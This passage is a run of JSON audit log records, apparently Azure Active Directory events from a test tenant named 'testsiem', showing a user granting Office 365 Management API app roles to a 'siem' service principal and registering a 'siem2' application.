"ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": 
"auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, 
{"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.2593808Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117959"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a73c1c7e-5591-4912-94cc-527ad6f48ed8"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": 
"71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": 
"{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.2593808Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117959"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a73c1c7e-5591-4912-94cc-527ad6f48ed8"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": 
"1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", 
"Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": 
"5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, 
{"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": 
"User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n false\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n \"siem2\"\r\n]"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 